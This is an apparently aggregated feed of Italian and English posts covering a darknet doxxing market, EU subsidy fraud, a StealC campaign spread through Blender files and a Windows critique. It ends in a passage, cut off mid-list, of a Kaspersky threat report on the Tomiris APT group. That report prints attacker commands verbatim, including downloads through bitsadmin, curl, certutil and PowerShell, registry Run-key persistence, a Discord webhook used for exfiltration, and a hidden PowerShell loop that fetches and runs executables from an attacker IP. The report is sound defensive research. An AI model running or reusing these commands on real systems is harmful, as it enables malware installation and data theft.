Il mercato del “controllo” delle persone è in onda sul Dark Web
Gli esperti di BI.ZONE hanno analizzato oltre 3.500 annunci pubblicitari su piattaforme darknet che offrono dossier su specifici individui, i cosiddetti “probiv” (finding). Un’offerta su cinque (21%) promette un profilo completo di un individuo.
Il mercato è suddiviso in tre fasce di prezzo. Una di tipo economico, è un controllo di base basato su uno o due parametri: ad esempio, la ricerca del nome completo e della data di nascita di una persona tramite un numero di telefono o un indirizzo email.
Tuttavia, la maggior parte delle offerte (75%) si colloca nella fascia di prezzo media, intorno ai 20 euro. Per questa cifra, promettono non solo di verificare l’identità di una persona utilizzando le informazioni di contatto, ma anche di compilare un dossier da vari database e registri, compresi quelli classificati. La principale fonte di informazioni sono le fughe di dati, sia pubbliche che a pagamento.
Il segmento premium, riportano i ricercatori, parte dai 33 e arriva ai 350 euro. Questo include servizi costosi e completi come un “dossier chiavi in mano”, un riepilogo di informazioni provenienti da tutti i principali database e registri. I criminali promettono di fornire informazioni su transazioni bancarie, attraversamenti di frontiera e persone giuridiche associate all’individuo.
Inoltre, gli aggressori pubblicano regolarmente offerte per i dipendenti di aziende chiedendo aiuto per ottenere dati riservati in cambio di una ricompensa. Gli esperti avvertono che per i dipendenti, tale attività interna costituisce una grave violazione della legge, con il rischio di responsabilità penale.
Anche i servizi per ottenere illegalmente dati di geolocalizzazione e registri delle chiamate sono molto diffusi. Un semplice registro di chiamate e SMS costa in media 250 euro. Un “flash”, ovvero un’unica localizzazione tramite dati di geolocalizzazione, costa leggermente di più. Il servizio più costoso (circa 400 euro) è il registro delle chiamate e dei messaggi geolocalizzati: un registro di chiamate e messaggi con informazioni sulla posizione di ciascun contatto.
Gli esperti hanno concluso che gli aggressori pubblicano costantemente nuove fughe di dati sui database delle risorse del darknet. Una quantità critica di informazioni su praticamente ogni individuo è già di pubblico dominio e i truffatori stanno sfruttando questi dati per il proprio tornaconto, anche tramite tecniche di ingegneria sociale.
I ricercatori hanno ricordato che chiunque può diventare un bersaglio per i truffatori, quindi è importante rimanere vigili e non cedere alle provocazioni, anche se la persona con cui si sta parlando al telefono o su un messenger fa riferimento a informazioni personali e apparentemente riservate.
L'articolo Il mercato del “controllo” delle persone è in onda sul Dark Web proviene da Red Hot Cyber.
Truffa ai danni dell’Unione Europea erogando falsi corsi di formazione: tra Lombardia e Puglia nei guai in sette nell’indagine della Procura Europea - EPPO condotta dai CC Tutela Lavoro
Il 25 novembre 2025 nelle province di Milano, Brescia e Foggia il Nucleo Operativo Tutela del Lavoro dei Carabinieri di Milano e della Sezione EPPO del Nucleo Investigativo Carabinieri del capoluogo lombardo hanno dato esecuzione a un'ordinanza di misura cautelare agli arresti domiciliari e a una misura interdittiva di inibizione dei contratti con la pubblica amministrazione e dell'esercizio di incarichi dirigenziali presso persone giuridiche e imprese, emesse dal Giudice per le Indagini Preliminari di Brescia su richiesta della Procura Europea - Sede di Milano, nei confronti di tre imprenditori italiani (due agli arresti domiciliari e uno sottoposto a misure interdittive). Gli individui sono ritenuti responsabili, in associazione tra loro, dei reati di truffa aggravata finalizzata al conseguimento di erogazioni pubbliche e autoriciclaggio.
L'indagine si è concentrata sulla verifica delle procedure di erogazione dei fondi UE alle aziende attraverso il "Fondo Nuove Competenze" ed è stata condotta attraverso un'ampia operazione di intercettazioni tecniche, analisi dei flussi finanziari condotta in coordinamento con l'Unità di Supporto all'Autorità Giudiziaria della Banca d'Italia e interviste a oltre 200 dipendenti. Ciò ha consentito agli investigatori di documentare le attività di due gruppi aziendali che fornivano servizi di consulenza, organizzando corsi di formazione fittizi per circa 1.500 dipendenti di 32 aziende, anche tramite una piattaforma digitale dedicata.
L'indagine ha accertato che il danno complessivo ai fondi pubblici e dell'Unione Europea ammonta a circa 40 milioni di euro a fronte del "Fondo Nuove Competenze", destinato a coprire una parte significativa degli stipendi dei dipendenti durante la partecipazione a corsi di formazione per il miglioramento delle loro competenze. Inoltre, gli indagati hanno condotto complesse operazioni finanziarie attraverso le quali hanno trasferito e investito i proventi della frode in attività commerciali, acquistando immobili tramite società immobiliari appositamente costituite nelle aree di Milano e Brescia per un valore di circa 20 milioni di euro.
Contemporaneamente, sono stati eseguiti altri sette mandati di perquisizione nei confronti di altre sette persone fisiche e giuridiche sotto inchiesta per gli stessi reati, ma non sottoposte a misure cautelari.
In totale, sette persone sono sotto inchiesta per vari ruoli nell'elaborata attività fraudolenta ai danni dell'Unione Europea, insieme a sette società utilizzate per perseguire lo stesso obiettivo.
I Carabinieri per la tutela del Lavoro operano alle dipendenze funzionali del Ministro del Lavoro e delle Politiche Sociali. Il personale dei Nuclei Carabinieri Ispettorato del Lavoro, in servizio presso gli Ispettorati Territoriali del Lavoro, dipende funzionalmente dal Dirigente preposto alla sede territoriale dell'Ispettorato e gerarchicamente dal comandante dell'articolazione del Comando CC Tutela del Lavoro; il personale addetto ai Nuclei Operativi di Gruppo (complessivamente sono istituiti 5 Gruppi, con sedi a Venezia, Milano, Roma, Napoli (con competenza interregionale) e Palermo (con competenza sulla Sicilia)), a seguito dell'avvio dell'Ispettorato Nazionale del Lavoro, dipende funzionalmente dai rispettivi Ispettorati Interregionali.
La Procura europea (EPPO) è un organismo indipendente dell'Unione europea operativo dal 1º giugno 2021 incaricato di indagare, perseguire e portare in giudizio i reati che ledono gli interessi finanziari dell'UE. L'EPPO è competente per i seguenti reati a danno del bilancio dell'UE: Frodi, Corruzione, Riciclaggio, Frodi IVA transfrontaliere. A livello nazionale
i Procuratori europei delegati sono responsabili dello svolgimento di indagini penali nei 24 paesi partecipanti, ed operano in piena indipendenza dalle autorità nazionali.
#EPPO
reshared this
La Gallery di Novembre
Ecco un po’ di foto dalle nostre Cellule Coscioni in giro per l’Italia: dalle proiezioni del film Lasciatemi morire ridendo, alla nascita della nuova Cellula Coscioni dell’Altomilanese, passando per l’incontro di Roma con Filomena Gallo e Marco Cappato, gli eventi informativi su Dat e di raccolta firme sull’Aborto senza ricovero. Clicca sull’icona della macchina fotografica per scorrere le foto!
L'articolo La Gallery di Novembre proviene da Associazione Luca Coscioni.
Leonardo presenta “Michelangelo Dome”, la cupola digitale anti-guerra ibrida
@Informatica (Italy e non Italy 😁)
Leonardo presenta “Michelangelo Dome”, il nuovo sistema avanzato di difesa integrata progettato dall’azienda per rispondere alle minacce emergenti in uno scenario globale sempre più complesso. Il progetto,
Informatica (Italy e non Italy 😁) reshared this.
The Eleven-Faced Die That Emulates Two Six-sided Dice
Rolling two six-sided dice (2d6) gives results from 2 to 12 with a bell curve distribution. Seven being the most common result, two and twelve being the least common. But what if one could do this with a single die?
As part of research Putting Rigid Bodies to Rest, researchers show that a single eleven-sided asymmetric shape can deliver the same results. That is to say, it rolls numbers 2 to 12 in the same distribution as 2d6. It’s actually just one of the oddball dice [Hossein Baktash] and his group designed so if you find yourself intrigued, be sure to check out the 3D models and maybe print your own!
The research behind this is a novel method of figuring out what stable resting states exist for a given rigid body, without resorting to simulations. The method is differentiable, meaning it can be used not just to analyze shapes, but also to design shapes with specific properties.
For example, with a typical three-sided die each die face has an equal chance of coming up. But [Hossein] shows (at 8:05 in the video, embedded below) that it’s possible to design a three-sided die where the faces instead have a 25%-50%-25% distribution.
How well do they perform in practice? [Hossein] has done some physical testing showing results seem to match theory, at least when rolled on a hard surface. But we don’t think anyone has loaded these into an automated dice tester, yet.
youtube.com/embed/lukjFtbw8ho?…
Malware StealC V2: Attacchi tramite file infetti per Blender 3D
I ricercatori di Morphisec hanno scoperto una campagna dannosa in cui gli aggressori distribuiscono l’infostealer StealC V2 tramite file infetti per l’editor Blender 3D, caricando il malware su marketplace come CGTrader.
Blender è un popolare progetto open source per la creazione di grafica 3D. Il programma supporta script Python per l’automazione, la creazione di pannelli di interfaccia personalizzati, componenti aggiuntivi, la personalizzazione dei processi di rendering e l’integrazione nelle pipeline di sviluppo.
Se la funzione di esecuzione automatica è abilitata, all’apertura di un file di rig per un personaggio, lo script Python può caricare automaticamente i controlli per l’animazione facciale e i pannelli personalizzati con i pulsanti e i cursori necessari. Nonostante i rischi, gli utenti spesso abilitano questa opzione per comodità.
Gli esperti di sicurezza hanno segnalato di aver rilevato attacchi che utilizzano file .blend dannosi con codice Python incorporato che scarica un malware downloader dal dominio Cloudflare Workers. Il downloader scarica quindi uno script PowerShell che scarica due archivi ZIP dall’infrastruttura degli aggressori: ZalypagyliveraV1 e BLENDERX.
Gli archivi vengono decompressi nella cartella %TEMP% e creano file LNK nella directory di avvio per essere persistenti sul sistema. Successivamente, vengono distribuiti due payload: l’infostealer StealC e un helper stealer Python, che probabilmente viene utilizzato come backup.
Secondo gli esperti, questa campagna ha utilizzato l’ultima modifica della seconda versione dello stealer StealC, analizzato dagli specialisti di Zscaler all’inizio di quest’anno.
L’ultima versione di StealC è dotata di funzionalità avanzate contro il furto di informazioni e supporta l’esfiltrazione di dati da:
- Oltre 23 browser con decrittazione delle credenziali lato server e compatibilità con Chrome 132 e versioni successive;
- Oltre 100 estensioni crittografiche per browser e oltre 15 portafogli crittografici desktop;
- Telegram, Discord, Tox, Pidgin, client VPN (ProtonVPN, OpenVPN) e client di posta elettronica (Thunderbird).
Inoltre, la nuova versione del malware è stata dotata di un meccanismo di bypass UAC aggiornato.
Sebbene questo malware sia stato documentato per la prima volta nel 2023 , le versioni e gli aggiornamenti successivi lo hanno reso praticamente impercettibile ai software antivirus. Morphisec, ad esempio, rileva che nessun prodotto su VirusTotal ha rilevato la variante StealC analizzata.
Dato che i marketplace di modelli 3D non possono verificare il codice nei file caricati dagli utenti, si consiglia agli utenti di Blender di prestare attenzione quando utilizzano risorse da tali piattaforme e di disattivare l’esecuzione automatica del codice. Le risorse 3D devono essere trattate come file eseguibili e devono essere considerate attendibili solo se provengono da editori affidabili. Per tutto il resto, si consiglia di utilizzare ambienti sandbox.
L'articolo Malware StealC V2: Attacchi tramite file infetti per Blender 3D proviene da Red Hot Cyber.
Brevetti, la Commissione Ue favorisce Nokia, Ericsson e Qualcomm? Gli subbi del Parlamento europeo
Per vedere altri post come questo, segui la comunità @Informatica (Italy e non Italy 😁)
Il Parlamento europeo porta la Commissione davanti alla Corte di giustizia dell’Ue per aver ritirato la proposta di riforma dei brevetti essenziali (SEPs), un
Informatica (Italy e non Italy 😁) reshared this.
Dio è in Cloud: ti hanno hackerato il cervello e ti è piaciuto
Siamo nell’era dell’inganno a pagamento. Ogni tuo click è un referendum privato in cui vincono sempre loro, gli algoritmi. E non sbagliano mai: ti osservano, ti profilano, ti conoscono meglio di tua madre. Tu pensi di scegliere il detersivo e invece è il detersivo che ha scelto te.
La pubblicità non vende più prodotti. Una volta si diceva che il prodotto sei tu, ma non è più nemmeno così. La pubblicità vende la tua attenzione, i tuoi riflessi, i tuoi tic. La manipolazione oggi è automatica, e il bello è che la chiami “comodità”. Ti convincono che decidi tu, ma il tasto “ACCETTA” è già la firma con cui ti arrendi.
Il prodotto sono le tue emozioni
Il vero prodotto non sei più tu, ma le tue emozioni. E chi può predirle, provocarle e addomesticarle ha in mano il potere vero. Alexa, Siri, ChatGPT, Netflix, Tinder sono tutti psicologi travestiti da assistenti digitali, pronti a dirti ciò che vuoi sentirti dire, pronti a cucirti addosso una realtà fatta su misura per te.
È la nuova Fede. Dio non è più in Cielo. Dio è in Cloud.
Vuoi la Libertà, ma la libertà digitale è come il ristorante: puoi scegliere cosa mangiare, ma il menù è già stato deciso da altri. Credi di fare la rivoluzione evitando Instagram, ma usi WhatsApp. Ti senti ribelle perché il tuo motore di ricerca è anonimo, ma le tue foto finiscono comunque sui telefoni e sui profili social di amici, colleghi e familiari.
Il vero problema è che, senza rendercene nemmeno conto, ci piace che la tecnologia ci conosca, che ci profili, che ci eviti di pensare. Ma dietro ogni tecnologia c’è un’azienda e dietro ogni azienda ci sono persone: investitori, dirigenti, impiegati, tutti concentrati a generare profitto oppure a guadagnarsi lo stipendio.
La catena della manipolazione
La manipolazione parte da un semplice schema:
Le piattaforme raccolgono dati sul tuo comportamento attraverso ogni interazione: ricerche, like, tempo di permanenza su un contenuto, pause, scroll. Gli algoritmi inferiscono il tuo funzionamento cognitivo: cosa ti emoziona, cosa ti distrae, cosa ti fa cliccare. Ti procurano stimoli calibrati sulle tue specifiche vulnerabilità cognitive. Non ti trattano come utente medio: ti profilano come sistema cognitivo unico da sfruttare.
TikTok riprogramma il cervello limbico dei tuoi figli. Google trasforma la tua attenzione in merce quotata. ChatGPT ti restituisce la realtà che vuoi sentire, non quella che esiste. Netflix sceglie cosa vuoi vedere prima che tu lo sappia.
E funziona. Perché non stai combattendo contro un venditore: stai combattendo contro un sistema che ha analizzato miliardi di comportamenti umani e sa esattamente quale leva tirare per farti fare quello che vuole.
L’illusione del controllo
“Non ho nulla da nascondere” dicono in molti. Sbagliato: non si tratta di cosa nascondi, ma di cosa ti fanno fare con quello che sanno di te. Il punto non è proteggere i tuoi segreti: è proteggere la tua capacità di decidere autonomamente.
Perché quando l’algoritmo sa che sei vulnerabile all’urgenza, ti manderà notifiche con un countdown. Quando sa che sei sensibile alla prova sociale, ti mostrerà quante persone hanno già acquistato. Quando sa che hai bisogno di validazione, ti proporrà contenuti che confermano i tuoi bias.
Diceva Lenin: “uno schiavo che non ha coscienza di essere schiavo e che non fa nulla per liberarsi, è veramente uno schiavo. Ma uno schiavo che ha coscienza di essere schiavo e che lotta per liberarsi già non è più schiavo, ma uomo libero.”
Se vuoi la Libertà, ti serve un nuovo antivirus: l’antivirus per i pensieri prefabbricati, per i like che diventano consenso, per le emozioni che ti programmano mentre ridi di un meme.
La consapevolezza come difesa
La cybersecurity tradizionale protegge i sistemi tecnologici. Ma oggi il perimetro da difendere non è più solo tecnologico: è cognitivo. Le vulnerabilità più pericolose non sono nei firewall, ma nelle scorciatoie mentali che usiamo per decidere velocemente.
I criminali informatici lo sanno bene. Il phishing più efficace non è quello tecnicamente sofisticato: è quello psicologicamente calibrato. Il pretexting funziona perché costruisce storie credibili che aggirano ogni difesa razionale. L’ingegneria sociale sfrutta la tua voglia di aiutare, la tua paura di sbagliare, la tua necessità di appartenere.
La difesa non può essere solo tecnologica. Deve essere cognitiva. E per essere efficace, deve partire dalla consapevolezza di come funziona realmente la manipolazione digitale.
Per chi vuole approfondire l’interconnessione tra manipolazione digitale, vulnerabilità cognitive e difesa comportamentale, il libroCYBERCOGNITIVISMO 2.0 – Manipolazione, Persuasione e Difesa Digitale(in arrivo su Amazon) offre un’analisi dettagliata delle tecniche con cui piattaforme e criminali hackerano il cervello umano, e propone framework pratici per trasformare la consapevolezza nella tua nuova difesa operativa.
L'articolo Dio è in Cloud: ti hanno hackerato il cervello e ti è piaciuto proviene da Red Hot Cyber.
reshared this
freezonemagazine.com/articoli/…
“Incredibile quello che la gente butta, abbandona e dimentica. Anche le cose più private di una casa finiscono qua. Quello che altri lasciamo a metà, a noi ci completa.[…] La verità era che anche noi non facevamo che grufolare nella spazzatura. Specie quando di venerdì aveva bevuto, o quando dava buca a una o due […]
L'articolo Sylvia Aguilar Zéleny – Spazzatura proviene da FREE ZONE
Per vedere altri post come questo, segui la comunità @Informatica (Italy e non Italy 😁)
Dati pubblici, tecnologie avanzate e collaborazione tra istituzioni: così InfoCamere e il Registro delle Imprese diventano strumenti strategici per
reshared this
La Mediatrice europea, Teresa Anjinho, ha condannato la sua Commissione per mala amministrazione, evidenziato diverse carenze procedurali nella preparazione di proposte legislative sull’Omnibus 1 (il pacchetto di semplificazione sulla due diligence societaria in materia di sostenibilità), sulla Politica Agricola Comune (PAC) e sul contrasto al traffico di migranti. Durante la preparazione di queste proposte urgenti, la Commissione non ha rispettato alcune regole interne, necessarie per garantire che il processo legislativo sia basato su evidenze, trasparente e inclusivo. Certi principi di buona legislazione non possono essere compromessi nemmeno per motivi di urgenza”, ha detto la Mediatrice Anjinho, ricordando che “è essenziale mantenere responsabilità e trasparenza nei processi legislativi”.
reshared this
Lo sciopero oggi in Italia visto dal Medio Oriente: la sinistra dormiente, Gaza, la Palestina
@Notizie dall'Italia e dal mondo
Gaza, la Sumud Flotilla e la questione palestinese sono riuscite a dare un nuovo impulso che ora spinge la debole sinistra italiana a lottare con più forza contro il governo di destra, scrive il quotidiano di Beirut Al
Notizie dall'Italia e dal mondo reshared this.
INTERPOL: conclusa l'Assemblea Generale, "Insieme contro la criminalità"
L'Assemblea Generale dell' #INTERPOL si è conclusa a Marrakech, in Marocco, il 27 novembre 2025, con l'approvazione all'unanimità da parte dei delegati di 196 Paesi membri di un nuovo Quadro Strategico per il periodo 2026-2030. Il quadro, in linea con la visione di INTERPOL "Insieme contro la criminalità", si concentra su tre pilastri:
- fungere da hub informativo globale per le forze dell'ordine,
- fornire supporto investigativo e
- fungere da portavoce per le attività di polizia a livello globale.
Tra i punti salienti figurano il successo del progetto pilota Silver Notice (lanciato nel gennaio 2025), che ha contribuito a rintracciare oltre 30 miliardi di euro di beni criminali, e le discussioni sulla lotta alla criminalità organizzata transnazionale, tra cui frodi informatiche, tratta di esseri umani e finanza illecita.
L'Assemblea ha inoltre eletto nuovi membri del Comitato Esecutivo, tra cui il francese Lucas Philippe come Presidente, e ha annunciato che la 94a Assemblea Generale si terrà a Hong Kong (Cina).
fabrizio reshared this.
Windows fa schifo? Il video di Dave Plummer, l’ingegnere Microsoft che creò il task manager
Dave Plummer, ex ingegnere senior molto stimato presso Microsoft, che ha guidato lo sviluppo di numerosi componenti fondamentali di Windows, tra cui Task Manager, il porting di Space Cadet Pinball per Windows NT e il supporto nativo per i file ZIP, ha ora affrontato pubblicamente una questione controversa, analizzando senza mezzi termini perché Windows “fa schifo”.
IT Home ha osservato che nel suo ultimo video su YouTube, “Windows “SUCKS”: How I’d Fix it by a retired Microsoft Windows engineer”, Plummer sottolinea che molte delle misure adottate da Microsoft per semplificare il sistema operativo e migliorare l’esperienza utente per gli utenti meno esperti hanno in realtà irritato un gruppo di utenti più attivi e avanzati, che si risentono del crescente numero di elementi di design restrittivi (guardrail) nel sistema.
Per risolvere questo conflitto, propone un suggerimento chiave: introdurre un interruttore per la “modalità minimalista” nel sistema . Abilitarlo riduce significativamente la “loquacità” del sistema, manifestata specificamente come segue:
- Smetti di promuovere proattivamente le raccomandazioni delle app;
- A meno che non venga esplicitamente indicato diversamente, le ricerche locali non attiveranno più le query di rete;
- La voce delle impostazioni di sistema è integrata per evitare che gli utenti debbano cercare elementi di configurazione in stile “caccia al tesoro” su diverse interfacce;
- Integrare in modo approfondito nel sistema strumenti di sviluppo e gestione avanzati quali Windows Subsystem for Linux (WSL), curl, Windows Terminal e WinGet Package Manager, assicurandosi che siano pronti all’uso e facilmente accessibili fin da subito.
Plummer ha inoltre affermato che il termine “telemetria” è ormai quasi una “parola sensibile“, ma ha sottolineato che abolire completamente la telemetria non è una buona soluzione; una soluzione migliore è quella di garantire agli utenti piena trasparenza e controllo, ad esempio introducendo un meccanismo di “registro della privacy”: registrare tutte le attività di raccolta dati in un formato chiaro e di facile comprensione e consentire agli utenti di disattivare liberamente il caricamento di specifici tipi di dati.
youtube.com/embed/oTpA5jt1g60?…
Ha inoltre sostenuto che durante la fase iniziale di configurazione di Windows, agli utenti dovrebbe essere presentato un chiaro confronto tra account locali e account Microsoft, con una spiegazione chiara dei rispettivi vantaggi e svantaggi, restituendo così la scelta agli utenti finali sufficientemente razionali.
Per quanto riguarda gli aggiornamenti di sistema, Pramer ha sottolineato in particolare che le installazioni degli aggiornamenti dovrebbero essere rigorosamente limitate ai periodi di scarsa attività degli utenti e dovrebbero essere accompagnate da una funzione di “rollback con un clic” per evitare interruzioni della produzione dovute a errori di aggiornamento durante i periodi di picco di lavoro.
Di particolare rilievo è l’acuta osservazione di Plummer secondo cui Windows sta diventando sempre più un canale di vendita per altri prodotti Microsoft : il sistema propone spesso suggerimenti di aggiornamento o abbonamento per vari prodotti e servizi. Ritiene che il passaggio alla “modalità minimalista” di cui sopra potrebbe risolvere anche questo problema: disattivare completamente ogni forma di richiesta promozionale.
Tuttavia, ammette anche che è improbabile che questa soluzione venga adottata dagli attuali dirigenti Microsoft: dopotutto, uno dei loro KPI principali è aumentare il tasso di conversione degli utenti che cliccano sui contenuti consigliati. Plummer afferma senza mezzi termini che questa è la causa principale della profonda avversione di molti utenti per Windows e della loro condanna come “terribile“: gli utenti hanno la sensazione di aver pagato per un prodotto, ma sono costretti a utilizzare una piattaforma di vendita che spinge costantemente le vendite.
L’intero video è stimolante, soprattutto considerando il profondo coinvolgimento del relatore nello sviluppo di Windows e la sua approfondita conoscenza della logica di progettazione e della storia del sistema. Oltre ai punti sopra menzionati, Pramer discute anche di altri punti critici, come la disconnessione funzionale di lunga data tra l’app Impostazioni e il tradizionale Pannello di controllo
L'articolo Windows fa schifo? Il video di Dave Plummer, l’ingegnere Microsoft che creò il task manager proviene da Red Hot Cyber.
Tomiris wreaks Havoc: New tools and techniques of the APT group
While tracking the activities of the Tomiris threat actor, we identified new malicious operations that began in early 2025. These attacks targeted foreign ministries, intergovernmental organizations, and government entities, demonstrating a focus on high-value political and diplomatic infrastructure. In several cases, we traced the threat actor’s actions from initial infection to the deployment of post-exploitation frameworks.
These attacks highlight a notable shift in Tomiris’s tactics, namely the increased use of implants that leverage public services (e.g., Telegram and Discord) as command-and-control (C2) servers. This approach likely aims to blend malicious traffic with legitimate service activity to evade detection by security tools.
Most infections begin with the deployment of reverse shell tools written in various programming languages, including Go, Rust, C/C#/C++, and Python. Some of them then deliver an open-source C2 framework: Havoc or AdaptixC2.
This report in a nutshell:
- New implants developed in multiple programming languages were discovered;
- Some of the implants use Telegram and Discord to communicate with a C2;
- Operators employed Havoc and AdaptixC2 frameworks in subsequent stages of the attack lifecycle.
Kaspersky’s products detect these threats as:
HEUR:Backdoor.Win64.RShell.gen,HEUR:Backdoor.MSIL.RShell.gen,HEUR:Backdoor.Win64.Telebot.gen,HEUR:Backdoor.Python.Telebot.gen,HEUR:Trojan.Win32.RProxy.gen,HEUR:Trojan.Win32.TJLORT.a,HEUR:Backdoor.Win64.AdaptixC2.a.
For more information, please contact intelreports@kaspersky.com.
Technical details
Initial access
The infection begins with a phishing email containing a malicious archive. The archive is often password-protected, and the password is typically included in the text of the email. Inside the archive is an executable file. In some cases, the executable’s icon is disguised as an office document icon, and the file name includes a double extension such as .doc<dozen_spaces>.exe. However, malicious executable files without icons or double extensions are also frequently encountered in archives. These files often have very long names that are not displayed in full when viewing the archive, so their extensions remain hidden from the user.
Example of a phishing email containing a malicious archive
Translation:
Subject: The Office of the Government of the Russian Federation on the issue of classification of goods sold in the territory of the Siberian Federal District
Body:
Dear colleagues!
In preparation for the meeting of the Executive Office of the Government of the Russian Federation on the classification of projects implemented in the Siberian Federal District as having a significant impact on the
socioeconomic development of the Siberian District, we request your position on the projects listed in the attached file. The Executive Office of the Government of Russian Federation on the classification of
projects implemented in the Siberian Federal District.
Password: min@2025
Example of an archive with a malicious executable
When the file is executed, the system becomes infected. However, different implants were often present under the same file names in the archives, and the attackers’ actions varied from case to case.
The implants
Tomiris C/C++ ReverseShell
Tomiris C/C++ ReverseShell infection schema
This implant is a reverse shell that waits for commands from the operator (in most cases that we observed, the infection was human-operated). After a quick environment check, the attacker typically issues a command to download another backdoor – AdaptixC2. AdaptixC2 is a modular framework for post-exploitation, with source code available on GitHub. Attackers use built-in OS utilities like bitsadmin, curl, PowerShell, and certutil to download AdaptixC2. The typical scenario for using the Tomiris C/C++ reverse shell is outlined below.
Environment reconnaissance. The attackers collect various system information, including information about the current user, network configuration, etc.
echo 4fUPU7tGOJBlT6D1wZTUk
whoami
ipconfig /all
systeminfo
hostname
net user /dom
dir
dir C:\users\
[username]Download of the next-stage implant. The attackers try to download AdaptixC2 from several URLs.
bitsadmin /transfer www /download http://<HOST>/winupdate.exe $public\libraries\winvt.exe
curl -o $public\libraries\service.exe http://<HOST>/service.exe
certutil -urlcache -f https://<HOST>/AkelPad.rar $public\libraries\AkelPad.rar
powershell.exe -Command powershell -Command "Invoke-WebRequest -Uri 'https://<HOST>/winupdate.exe' -OutFile '$public\pictures\sbschost.exe'
Verification of download success. Once the download is complete, the attackers check that AdaptixC2 is present in the target folder and has not been deleted by security solutions.
dir $temp
dir $public\libraries
Establishing persistence for the downloaded payload. The downloaded implant is added to the Run registry key.
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v WinUpdate /t REG_SZ /d $public\pictures\winupdate.exe /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Win-NetAlone" /t REG_SZ /d "$public\videos\alone.exe"
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Winservice" /t REG_SZ /d "$public\Pictures\dwm.exe"
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v CurrentVersion/t REG_SZ /d $public\Pictures\sbschost.exe /f
Verification of persistence success. Finally, the attackers check that the implant is present in the Run registry key.
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
This year, we observed three variants of the C/C++ reverse shell whose functionality ultimately provided access to a remote console. All three variants have minimal functionality – they neither replicate themselves nor persist in the system. In essence, if the running process is terminated before the operators download and add the next-stage implant to the registry, the infection ends immediately.
The first variant is likely based on the Tomiris Downloader source code discovered in 2021. This is evident from the use of the same function to hide the application window.
Code of window-hiding function in Tomiris C/C++ ReverseShell and Tomiris Downloader
Below are examples of the key routines for each of the detected variants.
Tomiris C/C++ ReverseShell main routine
Tomiris Rust Downloader
Tomiris Rust Downloader is a previously undocumented implant written in Rust. Although the file size is relatively large, its functionality is minimal.
Tomiris Rust Downloader infection schema
Upon execution, the Trojan first collects system information by running a series of console commands sequentially.
"cmd" /C "ipconfig /all"
"cmd" /C "echo %username%"
"cmd" /C hostname
"cmd" /C ver
"cmd" /C curl hxxps://ipinfo[.]io/ip
"cmd" /C curl hxxps://ipinfo[.]io/country
Then it searches for files and compiles a list of their paths. The Trojan is interested in files with the following extensions: .jpg, .jpeg, .png, .txt, .rtf, .pdf, .xlsx, and .docx. These files must be located on drives C:/, D:/, E:/, F:/, G:/, H:/, I:/, or J:/. At the same time, it ignores paths containing the following strings: “.wrangler”, “.git”, “node_modules”, “Program Files”, “Program Files (x86)”, “Windows”, “Program Data”, and “AppData”.
A multipart POST request is used to send the collected system information and the list of discovered file paths to Discord via the URL:
hxxps://discordapp[.]com/api/webhooks/1392383639450423359/TmFw-WY-u3D3HihXqVOOinL73OKqXvi69IBNh_rr15STd3FtffSP2BjAH59ZviWKWJRX
It is worth noting that only the paths to the discovered files are sent to Discord; the Trojan does not transmit the actual files.
The structure of the multipart request is shown below:
| Contents of the Content-Disposition header | Description |
| form-data; name=”payload_json” | System information collected from the infected system via console commands and converted to JSON. |
| form-data; name=”file”; filename=”files.txt” | A list of files discovered on the drives. |
| form-data; name=”file2″; filename=”ipconfig.txt” | Results of executing console commands like “ipconfig /all”. |
Example of “payload_json”
After sending the request, the Trojan creates two scripts, script.vbs and script.ps1, in the temporary directory. Before dropping script.ps1 to the disk, Rust Downloader creates a URL from hardcoded pieces and adds it to the script. It then executes script.vbs using the cscript utility, which in turn runs script.ps1 via PowerShell. The script.ps1 script runs in an infinite loop with a one-minute delay. It attempts to download a ZIP archive from the URL provided by the downloader, extract it to %TEMP%\rfolder, and execute all unpacked files with the .exe extension. The placeholder <PC_NAME> in script.ps1 is replaced with the name of the infected computer.
Content of script.vbs:
Set Shell = CreateObject("WScript.Shell")
Shell.Run "powershell -ep Bypass -w hidden -File %temp%\script.ps1"
Content of script.ps1:
$Url = "hxxp://193.149.129[.]113/<PC_NAME>"
$dUrl = $Url + "/1.zip"
while($true){
try{
$Response = Invoke-WebRequest -Uri $Url -UseBasicParsing -ErrorAction Stop
iwr -OutFile $env:Temp\1.zip -Uri $dUrl
New-Item -Path $env:TEMP\rfolder -ItemType Directory
tar -xf $env:Temp\1.zip -C $env:Temp\rfolder
Get-ChildItem $env:Temp\rfolder -Filter "*.exe" | ForEach-Object {Start-Process $_.FullName }
break
}catch{
Start-Sleep -Seconds 60
}
}
It’s worth noting that in at least one case, the downloaded archive contained an executable file associated with Havoc, another open-source post-exploitation framework.
Tomiris Python Discord ReverseShell
The Trojan is written in Python and compiled into an executable using PyInstaller. The main script is also obfuscated with PyArmor. We were able to remove the obfuscation and recover the original script code. The Trojan serves as the initial stage of infection and is primarily used for reconnaissance and downloading subsequent implants. We observed it downloading the AdaptixC2 framework and the Tomiris Python FileGrabber.
Tomiris Python Discord ReverseShell infection schema
The Trojan is based on the “discord” Python package, which implements communication via Discord, and uses the messenger as the C2 channel. Its code contains a URL to communicate with the Discord C2 server and an authentication token. Functionally, the Trojan acts as a reverse shell, receiving text commands from the C2, executing them on the infected system, and sending the execution results back to the C2.
Python Discord ReverseShell
Tomiris Python FileGrabber
As mentioned earlier, this Trojan is installed in the system via the Tomiris Python Discord ReverseShell. The attackers do this by executing the following console command.
cmd.exe /c "curl -o $public\videos\offel.exe http://<HOST>/offel.exe"
The Trojan is written in Python and compiled into an executable using PyInstaller. It collects files with the following extensions into a ZIP archive: .jpg, .png, .pdf, .txt, .docx, and .doc. The resulting archive is sent to the C2 server via an HTTP POST request. During the file collection process, the following folder names are ignored: “AppData”, “Program Files”, “Windows”, “Temp”, “System Volume Information”, “$RECYCLE.BIN”, and “bin”.
Python FileGrabber
Distopia backdoor
Distopia Backdoor infection schema
The backdoor is based entirely on the GitHub repository project “dystopia-c2” and is written in Python. The executable file was created using PyInstaller. The backdoor enables the execution of console commands on the infected system, the downloading and uploading of files, and the termination of processes. In one case, we were able to trace a command used to download another Trojan – Tomiris Python Telegram ReverseShell.
Distopia backdoor
Sequence of console commands executed by attackers on the infected system:
cmd.exe /c "dir"
cmd.exe /c "dir C:\user\[username]\pictures"
cmd.exe /c "pwd"
